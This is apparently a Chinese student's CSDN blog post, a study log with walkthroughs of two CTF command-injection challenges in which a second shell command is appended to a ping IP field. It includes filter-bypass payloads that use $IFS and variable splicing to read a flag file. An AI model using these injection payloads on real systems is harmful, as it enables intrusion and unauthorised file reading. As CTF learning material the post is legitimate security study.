网安学习第十二天

最新推荐文章于 2024-08-29 16:08:22 发布
最新推荐文章于 2024-08-29 16:08:22 发布
阅读量43 收藏
点赞数
文章标签: 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80423315/article/details/134190975
版权

ACTF2020 新生赛 Exec1

步骤:

1.测试ping 127.0.0.1

2.测试ping 127.0.0.1&Is

3.测试ping 127.0.0.1&Is/,发现目录有flag

4.输入127.0.0.1&cat/flag,即可得到flag

 

GXYCTF2019 Ping Ping Ping1

步骤:

1.尝试ping 127.0.0.1

2.尝试查看当前目录下的文件

?ip=127.0.0.1;Is

3.查看flag.php

?ip=127.0.0.1;cat flag.php

系统提示空格被过滤

再使用?ip=127.0.0.1;cat;flag.php

系统提示flag被过滤

3.利用参数替代的方法

?ip=127.0.0.1;b=g;cat$IFS$fla$b.php

即可得到flag

注:

1.以上所有指令均在url上进行

2.tac函数是cat函数的反写

 

 

 

 

2301_80423315
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网安学习(二十)ACL
m0_56413004的博客
06-01 568
ACL是一种包过滤技术ACL基于IP包头的IP地址、四层TCP/UDP头部的端口号、[5层数据]基于三层和四层过滤ACL在路由器上配置,也可以在防火墙上配置(一般称为策略)ACL主要分为两大类: 表号:1-99 特点:只能基于源IP对包进行过滤 命令: 表号:100-199 特点:可以基于源IP、目标IP、端口号、协议等对包进行过滤 命令:中括号内的命令代表可选1)ACL表必须应用到接口的进或出方向才生效2)一个接口的一个方
网安学习(二十四)传输层协议
m0_56413004的博客
06-11 341
传输层的功能:定义应用层协议数据报文的端口号,流量控制对原始数据进行分段处理1.传输连接服务2.数据传输服务:流量控制、差错控制、序列控制1、面向连接的传输协议(TCP)要求数据在传输以前必须建立连接,数据传输完成后,必须释放连接仅支持单播传输:在两个终端之间建立点对点连接2、UDP(用户数据报协议)TCP源端口(Source Port):源计算机上的应用程序的端口号,占16位TCP目的端口(Destination Port):目标计算机的应用程序端口号,占16位序号(Sequence Number):占3
网安学习第八天
2301_80423315的博客
10-28 30
分析代码,在禁止上关可用的空格基础上,我们可用加点的方式,在.php后加一点即可(.php.)从代码处可得知,需要对上传的文件名进行重新拼接,使用$_GET传参,可通过%00进行截断上传。注:由于至第十三关开始到最后一关,给出的解析或少或无法理解导致没法记录。上传.jpg文件并将文件名后缀改为/.jpg%00放包。2.自十一关开始,由于网安知识过少导致无法理解解题思路。通过上传文件名后加上点+空格+点,改为.php. .故我们可以在后缀处加上::$DATA。第十一关 文件路径%00截断。
网安学习day12(SQL注入)
m0_57485346的博客
11-18 647
网安学习12(SQL注入)
网安学习-应急响应3
weixin_44770698的博客
08-08 1802
网安学习-应急响应3
网安学习——信息收集
haoaaao的博客
02-12 2732
一、架构、搭建、waf
1网安公开课学习记录-第一天
hanhandehanpi的博客
01-01 864
渗透测试、网安学习、基本概念
网安学习之道》第一季计算机基础12_在路由器上配置DHCP
weixin_41960510的博客
10-11 974
使客户记可以通过路由器所提供的DHCP服务获取IP地址
网安学习之道》第一季计算机基础22_动态路由协议RIP
weixin_41960510的博客
10-21 518
是一种内部网关路由协议,是在单一自制系统内的路由器去传递信息的。靠跳数(metric)来决定(来衡量到达目的的距离),最大16跳,十六跳为不可达每隔30秒向相邻端口发送和更新路由信息,采用的是UDP520端口。经历两个时间周期及完成。RIP动态路由协议是通过相邻的路由器去学习对应的路由条目。
网安学习之道》第一季计算机基础11_静态路由
weixin_41960510的博客
10-10 308
静态路由是管理员手动分配路由路径
软件测试学习笔记丨Pytest配置文件
ceshiren_com的博客
08-27 1743
pytest.ini是pytest的配置文件;可以修改pytest的默认行为;不能使用任何中文符号,包括汉字、空格、引号、冒号等。
MySQL基础学习
eugene03的博客
08-29 1307
事务是一组操作的集合,它是一个不可分割的工作单位,事务会把所有操作作为一个整体一起向系统提交或者撤掉操作请求,那么这些操作要么同时成功,要么同时失败。笛卡尔积:两个集合 A集合和B集合的所有组合情况(在多表查询时,需要消除无效的笛卡尔积)对于union 查询,就是把多次查询的结果合并起来,行程一个新的查询结果集。相当于查询表1(左表)的所有数据包含表1和表2交集部分的数据。相当于查询表2(右表)的所有数据包含表1和表2交集部分的数据。自连接查询,可以是内连接查询,也可以是外连接查询。
前端开发学习Docker记录02容器操作
第⑦个前端
08-29 808
使用docker ps 可以看到有哪些镜像在运行。
【AI学习】在魔塔社区玩Ollama:部署GLM4和CodeGeeX4
bylander的博客
08-27 953
尝试了一下CodeGeeX4-ALL-9B 的Ollama部署。GPU要明显快很多,CPU的速度,也还凑合吧
html+css+js网页设计 个人博客模版 我的学习经历7个页面
qq_42431718的博客
08-28 622
html+css+js网页设计 个人博客模版 我的学习经历7个页面 网页作品代码简单,可使用任意HTML编辑软件(如:Dreamweaver、HBuilder、Vscode 、Sublime 、Webstorm、Text 、Notepad++ 等任意html编辑软件进行运行及修改编辑等操作)。
ArkTS基础快速入门学习
最新发布
weixin_49898946的博客
08-29 535
ArkTS语言在TS语言基础上扩展了声明式UI,组件化,状态管理等功能。官方推荐两种开发模式开发鸿蒙,一种是基于js扩展的类web范式,另一种是基于TS扩展的声明式UI范式(也就是使用ArkTS开发)。主要介绍harmonyos的页面布局和组件的基础使用
Golang学习笔记-Golang中的锁
qq_24428851的博客
08-25 1683
Go标准库的中的sync.Cond是一个条件变量,它可以让一系列的goroutine都在满足特定条件下时候被唤醒,每一个 sync.Cond 结构体在初始化时都需要传入一个互斥锁,我们可以通过下面的例子了解它的使用方法。因为请求的哈希在业务上一般表示相同的请求,所以上述代码使用它作为请求的键。这个是Go语言的扩展包中提供的另外一个信号量,它能够在一个服务中抑制对下游的多次重复请求,比如在redis的缓存雪崩中,能够限制对同一个 Key 的多次重复请求,减少对下游的瞬时流量。上述两个加起来,只占用8个字节。
快速学习“堆“排序(C语言数据结构)
m0_75235246的博客
08-26 881
堆的实现其实并不难,难的是要用堆实现排序,也就是堆的运用。下面需要探究一下堆的排序是怎样的。如何利用堆进行升序或者降序的排序。
先从路径优化开始学习FastPlanner之B样条曲线平滑路径(一):从拉格朗日插值到B样条曲线
qq_51013517的博客
08-25 1248
B样条学习整理,易错点和关键点。我会列出学习他人的博客,但我不涉及具体推导,原理讲解,旨在于理解必须概念后写代码出效果和使用。
网安学习零基础学习课程
08-12
在进行网络安全学习时,对于零基础学习者来说,第一步是要了解基本的概念和术语,例如SQL注入和XSS跨站脚本攻击。此外,对于一些常用的安全工具如Burp、MSF和CS等也需要了解其基本操作。<span class="em">1</span>...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值